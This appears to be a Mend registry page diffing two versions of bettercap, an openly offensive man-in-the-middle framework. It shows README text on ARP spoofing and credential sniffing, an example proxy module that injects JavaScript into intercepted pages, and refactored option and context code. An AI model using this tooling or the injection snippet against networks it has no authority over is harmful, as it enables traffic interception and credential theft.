RubyGems - bettercap - Versions diffs - 1.1.1 → 1.1.2 - Mend

bettercap 1.1.1 → 1.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (35) hide show

checksums.yaml +4 -4
data/.gitignore +5 -0
data/LICENSE.md +596 -0
data/README.md +18 -15
data/TODO.md +22 -0
data/bettercap.gemspec +1 -6
data/bin/bettercap +35 -46
data/lib/bettercap.rb +39 -0
data/lib/bettercap/base/ifirewall.rb +11 -5
data/lib/bettercap/base/ispoofer.rb +9 -3
data/lib/bettercap/context.rb +48 -38
data/lib/bettercap/discovery/arp.rb +18 -2
data/lib/bettercap/discovery/base.rb +64 -0
data/lib/bettercap/discovery/icmp.rb +3 -3
data/lib/bettercap/discovery/syn.rb +6 -49
data/lib/bettercap/discovery/udp.rb +23 -58
data/lib/bettercap/factories/firewall_factory.rb +1 -1
data/lib/bettercap/factories/parser_factory.rb +27 -25
data/lib/bettercap/factories/spoofer_factory.rb +19 -13
data/lib/bettercap/firewalls/linux.rb +3 -11
data/lib/bettercap/firewalls/osx.rb +5 -18
data/lib/bettercap/httpd/server.rb +4 -4
data/lib/bettercap/network.rb +87 -74
data/lib/bettercap/proxy/module.rb +1 -1
data/lib/bettercap/proxy/proxy.rb +3 -3
data/lib/bettercap/proxy/request.rb +5 -5
data/lib/bettercap/proxy/response.rb +2 -2
data/lib/bettercap/sniffer/parsers/base.rb +13 -13
data/lib/bettercap/sniffer/sniffer.rb +19 -2
data/lib/bettercap/spoofers/arp.rb +5 -5
data/lib/bettercap/target.rb +18 -18
data/lib/bettercap/version.rb +1 -1
metadata +10 -7
data/LICENSE +0 -225
data/example_proxy_module.rb +0 -21

data/README.md CHANGED

@@ -1,10 +1,10 @@
-BETTERCAP
-==
+![logo](http://www.bettercap.org/images/logo_dark.png)
-Copyleft of **Simone 'evilsocket' Margaritelli**.
-http://www.evilsocket.net/
+Copyleft of Simone '[evilsocket](https://twitter.com/evilsocket)' Margaritelli*.
 http://www.bettercap.org/
+[![Gem Version](https://badge.fury.io/rb/bettercap.svg)](http://badge.fury.io/rb/bettercap)
 ---
 **bettercap** is a complete, modular, portable and easily extensible **MITM** tool and framework with every kind of diagnostic
@@ -38,7 +38,7 @@ HOST DISCOVERY + ARP MAN IN THE MIDDLE
 You can target the whole network or a single known address, it doesn't really matter, bettercap arp spoofing capabilities and its multiple hosts discovery agents will do the dirty work for you.
 Just launch the tool and wait for it to do its job ... again, [KISS!](https://en.wikipedia.org/wiki/KISS_principle)
-![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/discovery.png)
+![credentials](http://bettercap.org/images/discovery.png)
 CREDENTIALS SNIFFER
 ===
@@ -54,7 +54,7 @@ The built in sniffer is currently able to dissect and print from the network the
 - POP, IMAP and SMTP credentials.
 - NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
-![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/credentials.png)
+![credentials](http://bettercap.org/images/credentials.png)
 **Examples**
@@ -76,8 +76,9 @@ MODULAR TRANSPARENT PROXY
 A modular transparent proxy can be started with the --proxy argument, by default it won't do anything
 but logging HTTP requests, but if you specify a **--proxy-module** argument you will be able to load
 your own modules and manipulate HTTP traffic as you like.
+You can find some example modules in the [dedicated repository](https://github.com/evilsocket/bettercap-proxy-modules).
-![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/proxy.png)
+![credentials](http://bettercap.org/images/proxy.png)
 **Examples**
@@ -89,9 +90,9 @@ Enable proxy and use a custom port:
     sudo bettercap --proxy --proxy-port=8081
-Enable proxy and load the module **example_proxy_module.rb**:
+Enable proxy and load the module **hack_title.rb**:
-    sudo bettercap --proxy --proxy-module=example_proxy_module.rb
+    sudo bettercap --proxy --proxy-module=hack_title.rb
 Disable spoofer and enable proxy ( stand alone proxy mode ):
@@ -134,10 +135,10 @@ class InjectJS < Proxy::Module
     if response.content_type == 'text/html'
       Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
       # get the local interface address and HTTPD port
-      localaddr = Context.get.iface[:ip_saddr]
+      localaddr = Context.get.ifconfig[:ip_saddr]
       localport = Context.get.options[:httpd_port]
       # inject the js
-      response.body.sub!( '</title>', "<script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script></title>" )
+      response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script>" )
     end
   end
 end
@@ -165,8 +166,10 @@ HOW TO INSTALL
 DEPENDS
 ===
-All dependencies will be automatically installed through the GEM system.
+All dependencies will be automatically installed through the GEM system, in some case you might need to install some system
+dependency in order to make everything work:
+    sudo apt-get install ruby-dev libpcap-dev
+This should solve issues such as [this one](https://github.com/evilsocket/bettercap/issues/22).
-- colorize (**gem install colorize**)
-- packetfu (**gem install packetfu**)
-- pcaprub  (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]

data/TODO.md ADDED

@@ -0,0 +1,22 @@
+This is a list of TODOs I use to keep track of tasks and upcoming features.
+---
+- [x] Replace PacketFu::Utils::whoami? with something else.
+- [x] Capture to .pcap file.
+- [x] BPF filters.
+- [x] BeEF proxy module ( [BeefBOX](https://github.com/evilsocket/bettercap-proxy-modules/blob/master/beefbox.rb) ).
+- [ ] ICMP Redirect.
+- [ ] sslstrip
+- [ ] sslmitm
+- [ ] *BSD Support.
+- [ ] HTTP/2 Support.
+- [ ] Active packet filtering/injection/etc.
+**Maybe**
+- [ ] Replace webrick with thin ( proxy too? )
+- [ ] DNS Spoofing ( not sure if it actually makes any sense ).
+- [ ] Windows Support? ( OMG PLZ NO! )
+- [ ] Output/actions as json for UI integration?
+- [ ] BeefBox / BeefDRONE with Raspberry PI?

data/bettercap.gemspec CHANGED

@@ -15,12 +15,7 @@ Gem::Specification.new do |gem|
   gem.add_dependency( 'packetfu', '~> 1.1.10' )
   gem.add_dependency( 'pcaprub', '~> 0.12.0' )
-  gem.files = Dir.glob("lib/**/*") + Dir.glob("bin/*") + [
-      "LICENSE",
-      "README.md",
-      "bettercap.gemspec",
-      "example_proxy_module.rb"
-  ]
+  gem.files = `git ls-files`.split("\n")
   gem.require_paths = ["lib"]
   gem.executables   = %w(bettercap)

data/bin/bettercap CHANGED

@@ -12,34 +12,9 @@
 =end
-require 'optparse'
-require 'colorize'
-require 'packetfu'
-require 'ipaddr'
-Object.send :remove_const, :Config rescue nil
-Config = RbConfig
-require 'bettercap/error'
-require 'bettercap/context'
-require 'bettercap/monkey/packetfu/utils'
-require 'bettercap/factories/firewall_factory'
-require 'bettercap/factories/spoofer_factory'
-require 'bettercap/factories/parser_factory'
-require 'bettercap/logger'
-require 'bettercap/shell'
-require 'bettercap/network'
-require 'bettercap/version'
-require 'bettercap/target'
-require 'bettercap/sniffer/sniffer'
-require 'bettercap/proxy/request'
-require 'bettercap/proxy/response'
-require 'bettercap/proxy/proxy'
-require 'bettercap/proxy/module'
-require 'bettercap/httpd/server'
+require 'bettercap'
 begin
   puts BetterCap::BANNER.green.bold
   puts "\n\n\n"
@@ -48,7 +23,7 @@ begin
   OptionParser.new do |opts|
     opts.banner = "Usage: #{$0} [options]"
-    opts.on( '-I', '--interface IFACE', 'Network interface name - default: ' + ctx.options[:iface] ) do |v|
+    opts.on( '-I', '--interface IFACE', 'Network interface name - default: ' + ctx.options[:iface].to_s ) do |v|
       ctx.options[:iface] = v
     end
@@ -70,15 +45,25 @@ begin
     opts.on( '-L', '--local', 'Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to false.' ) do
       ctx.options[:local] = true
-      ctx.options[:sniffer] = true
+      ctx.options[:sniffer] = true
     end
     opts.on( '-X', '--sniffer', 'Enable sniffer.' ) do
       ctx.options[:sniffer] = true
     end
+    opts.on( '--sniffer-pcap FILE', 'Save all packets to the specified PCAP file ( will enable sniffer ).' ) do |v|
+      ctx.options[:sniffer] = true
+      ctx.options[:sniffer_pcap] = File.expand_path v
+    end
+    opts.on( '--sniffer-filter EXPRESSION', 'Configure the sniffer to use this BPF filter ( will enable sniffer ).' ) do |v|
+      ctx.options[:sniffer] = true
+      ctx.options[:sniffer_filter] = v
+    end
     opts.on( '-P', '--parsers PARSERS', 'Comma separated list of packet parsers to enable, "*" for all ( NOTE: Will set -X to true ), available: ' + ParserFactory.available.join(', ') + ' - default: *' ) do |v|
-      ctx.options[:sniffer] = true
+      ctx.options[:sniffer] = true
       ctx.options[:parsers] = ParserFactory.from_cmdline(v)
     end
@@ -86,15 +71,21 @@ begin
       ctx.options[:arpcache] = true
     end
+    opts.on( '--no-spoofing', 'Disable spoofing, alias for --spoofer NONE.' ) do |v|
+      ctx.options[:spoofer] = 'NONE'
+    end
     opts.on( '--proxy', 'Enable HTTP proxy and redirects all HTTP requests to it, default to false.' ) do
       ctx.options[:proxy] = true
     end
     opts.on( '--proxy-port PORT', 'Set HTTP proxy port, default to ' + ctx.options[:proxy_port].to_s + ' .' ) do |v|
+      ctx.options[:proxy] = true
       ctx.options[:proxy_port] = v.to_i
     end
     opts.on( '--proxy-module MODULE', 'Ruby proxy module to load.' ) do |v|
+      ctx.options[:proxy] = true
       ctx.options[:proxy_module] = File.expand_path v
     end
@@ -136,18 +127,18 @@ begin
   end.parse!
   raise BetterCap::Error, 'This software must run as root.' unless Process.uid == 0
+  raise BetterCap::Error, 'No default interface found, please specify one with the -I argument.' unless !ctx.options[:iface].nil?
   Logger.debug_enabled = true unless !ctx.options[:debug]
   Logger.logfile = ctx.options[:logfile]
   ctx.update_network
   if ctx.options[:target].nil?
     Logger.info "Targeting the whole subnet #{ctx.network.to_range} ..."
     ctx.start_discovery_thread
   else
     raise BetterCap::Error, "Invalid target '#{ctx.options[:target]}'" unless Network.is_ip? ctx.options[:target]
@@ -156,7 +147,7 @@ begin
   ctx.spoofer = SpooferFactory.get_by_name( ctx.options[:spoofer] )
-  Logger.info "  Local : #{ctx.iface[:ip_saddr]} ( #{ctx.iface[:eth_saddr]} )"
+  Logger.info "  Local : #{ctx.ifconfig[:ip_saddr]} ( #{ctx.ifconfig[:eth_saddr]} )"
   Logger.debug "Module: #{ctx.options[:spoofer]}"
@@ -167,23 +158,23 @@ begin
       Logger.warn "WARNING: Both HTTP transparent proxy and URL parser are enabled, you're gonna see duplicated logs."
     end
-    ctx.firewall.add_port_redirection( ctx.options[:iface], 'TCP', 80, ctx.iface[:ip_saddr], ctx.options[:proxy_port] )
+    ctx.firewall.add_port_redirection( ctx.options[:iface], 'TCP', 80, ctx.ifconfig[:ip_saddr], ctx.options[:proxy_port] )
     if not ctx.options[:proxy_module].nil?
       require ctx.options[:proxy_module]
-      Proxy::Module.register_modules
+      Proxy::Module.register_modules
       raise BetterCap::Error, "#{ctx.options[:proxy_module]} is not a valid bettercap proxy module." unless !Proxy::Module.modules.empty?
     end
-    ctx.proxy = Proxy::Proxy.new( ctx.iface[:ip_saddr], ctx.options[:proxy_port] ) do |request,response|
+    ctx.proxy = Proxy::Proxy.new( ctx.ifconfig[:ip_saddr], ctx.options[:proxy_port] ) do |request,response|
       if Proxy::Module.modules.empty?
         Logger.warn 'WARNING: No proxy module loaded, skipping request.'
       else
         # loop each loaded module and execute if enabled
         Proxy::Module.modules.each do |mod|
-          if mod.is_enabled?
+          if mod.enabled?
             mod.on_request request, response
           end
         end
@@ -199,21 +190,19 @@ begin
   end
   if ctx.options[:sniffer]
-      Sniffer.start ctx
+    Sniffer.start ctx
   else
-      Logger.warn 'WARNING: Sniffer module was NOT enabled ( -X argument ), this will cause the MITM to run but no data to be collected.'
+    Logger.warn 'WARNING: Sniffer module was NOT enabled ( -X argument ), this will cause the MITM to run but no data to be collected.'
-      loop do
-        sleep 1
-      end
+    loop do
+      sleep 1
+    end
   end
 rescue SystemExit, Interrupt
   Logger.write "\n"
 rescue BetterCap::Error => e
   Logger.error e.message
 rescue Exception => e

data/lib/bettercap.rb ADDED

@@ -0,0 +1,39 @@
+#!/usr/bin/env ruby
+=begin
+  BETTERCAP
+  Author : Simone 'evilsocket' Margaritelli
+  Email  : evilsocket@gmail.com
+  Blog   : http://www.evilsocket.net/
+  This project is released under the GPL 3 license.
+=end
+require 'optparse'
+require 'colorize'
+require 'packetfu'
+require 'ipaddr'
+Object.send :remove_const, :Config rescue nil
+Config = RbConfig
+require 'bettercap/error'
+require 'bettercap/context'
+require 'bettercap/monkey/packetfu/utils'
+require 'bettercap/factories/firewall_factory'
+require 'bettercap/factories/spoofer_factory'
+require 'bettercap/factories/parser_factory'
+require 'bettercap/logger'
+require 'bettercap/shell'
+require 'bettercap/network'
+require 'bettercap/version'
+require 'bettercap/target'
+require 'bettercap/sniffer/sniffer'
+require 'bettercap/proxy/request'
+require 'bettercap/proxy/response'
+require 'bettercap/proxy/proxy'
+require 'bettercap/proxy/module'
+require 'bettercap/httpd/server'

data/lib/bettercap/base/ifirewall.rb CHANGED

@@ -11,18 +11,24 @@ This project is released under the GPL 3 license.
 =end
 class IFirewall
   def enable_forwarding(enabled)
-    raise 'IFirewall: Unimplemented method!'
+    not_implemented_method!
   end
-  def forwarding_enabled?()
-    raise 'IFirewall: Unimplemented method!'
+  def forwarding_enabled?
+    not_implemented_method!
   end
   def add_port_redirection( iface, proto, from, addr, to )
-    raise 'IFirewall: Unimplemented method!'
+    not_implemented_method!
   end
   def del_port_redirection( iface, proto, from, addr, to )
-    raise 'IFirewall: Unimplemented method!'
+    not_implemented_method!
+  end
+private
+  def not_implemented_method!
+    raise NotImplementedError, 'IFirewall: Unimplemented method!'
   end
 end

data/lib/bettercap/base/ispoofer.rb CHANGED

@@ -11,14 +11,20 @@ This project is released under the GPL 3 license.
 =end
 class ISpoofer
   def initialize
-    raise 'ISpoofer: Unimplemented method!'
+    not_implemented_method!
   end
   def start
-    raise 'ISpoofer: Unimplemented method!'
+    not_implemented_method!
   end
   def stop
-    raise 'ISpoofer: Unimplemented method!'
+    not_implemented_method!
+  end
+private
+  def not_implemented_method!
+    raise NotImplementedError, 'ISpoofer: Unimplemented method!'
   end
 end

data/lib/bettercap/context.rb CHANGED

@@ -14,65 +14,69 @@ This project is released under the GPL 3 license.
 require 'bettercap/error'
 class Context
-  attr_accessor :options, :iface, :ifconfig, :network, :firewall, :gateway,
+  attr_accessor :options, :ifconfig, :network, :firewall, :gateway,
                 :targets, :spoofer, :proxy, :httpd
   @@instance = nil
   def self.get
-    if @@instance.nil?
-      @@instance = self.new
-    end
-    @@instance
+    @@instance ||= self.new
   end
   def initialize
+    begin
+      iface = Pcap.lookupdev
+    rescue Exception => e
+      iface = nil
+      Logger.debug e.message
+    end
     @options = {
-        :iface => Pcap.lookupdev,
-        :spoofer => 'ARP',
-        :target => nil,
-        :logfile => nil,
-        :sniffer => false,
-        :parsers => ['*'],
-        :local => false,
-        :debug => false,
-        :arpcache => false,
-        :proxy => false,
-        :proxy_port => 8080,
-        :proxy_module => nil,
-        :httpd => false,
-        :httpd_port => 8081,
-        :httpd_path => './'
+      :iface => iface,
+      :spoofer => 'ARP',
+      :target => nil,
+      :logfile => nil,
+      :debug => false,
+      :arpcache => false,
+      :sniffer => false,
+      :sniffer_pcap => nil,
+      :sniffer_filter => nil,
+      :parsers => ['*'],
+      :local => false,
+      :proxy => false,
+      :proxy_port => 8080,
+      :proxy_module => nil,
+      :httpd => false,
+      :httpd_port => 8081,
+      :httpd_path => './'
     }
-    @iface = nil
-    @ifconfig = nil
-    @network = nil
-    @firewall = nil
-    @gateway = nil
-    @targets = []
-    @proxy = nil
-    @spoofer = nil
-    @httpd = nil
+    @ifconfig  = nil
+    @network   = nil
+    @firewall  = nil
+    @gateway   = nil
+    @targets   = []
+    @proxy     = nil
+    @spoofer   = nil
+    @httpd     = nil
     @discovery_running = false
-    @discovery_thread = nil
+    @discovery_thread  = nil
   end
   def update_network
     @firewall = FirewallFactory.get_firewall
-    @iface    = PacketFu::Utils.whoami? :iface => @options[:iface]
     @ifconfig = PacketFu::Utils.ifconfig @options[:iface]
     @network  = @ifconfig[:ip4_obj]
     @gateway  = Network.get_gateway
     raise BetterCap::Error, "Could not determine IPv4 address of '#{@options[:iface]}' interface." unless !@network.nil?
-    Logger.debug "network=#{@network} gateway=#{@gateway} local_ip=#{@iface[:ip_saddr]}"
+    Logger.debug "network=#{@network} gateway=#{@gateway} local_ip=#{@ifconfig[:ip_saddr]}"
     Logger.debug "IFCONFIG: #{@ifconfig.inspect}"
-    Logger.debug "IFACE: #{@iface.inspect}"
   end
   def start_discovery_thread
@@ -83,9 +87,12 @@ class Context
       while @discovery_running
         empty_list = false
-        if @targets.size == 0 and !@options[:arpcache]
+        if @targets.empty? and !@options[:arpcache]
           empty_list = true
           Logger.info 'Searching for alive targets ...'
+        else
+          # make sure we don't stress the logging system
+          sleep 10
         end
         @targets = Network.get_alive_targets self
@@ -102,9 +109,11 @@ class Context
   def stop_discovery_thread
     @discovery_running = false
     if @discovery_thread != nil
       Logger.info 'Stopping network discovery thread ...'
+      # I doubt this will ever raise an exception
       begin
         @discovery_thread.join
       rescue
@@ -115,13 +124,14 @@ class Context
   def finalize
     stop_discovery_thread
+    # Consider !!@spoofer
     if !@spoofer.nil?
       @spoofer.stop
     end
     if !@proxy.nil?
       @proxy.stop
-      @firewall.del_port_redirection( @options[:iface], 'TCP', 80, @iface[:ip_saddr], @options[:proxy_port] )
+      @firewall.del_port_redirection( @options[:iface], 'TCP', 80, @ifconfig[:ip_saddr], @options[:proxy_port] )
     end
     if !@firewall.nil?
@@ -132,4 +142,4 @@ class Context
       @httpd.stop
     end
   end
-end
+end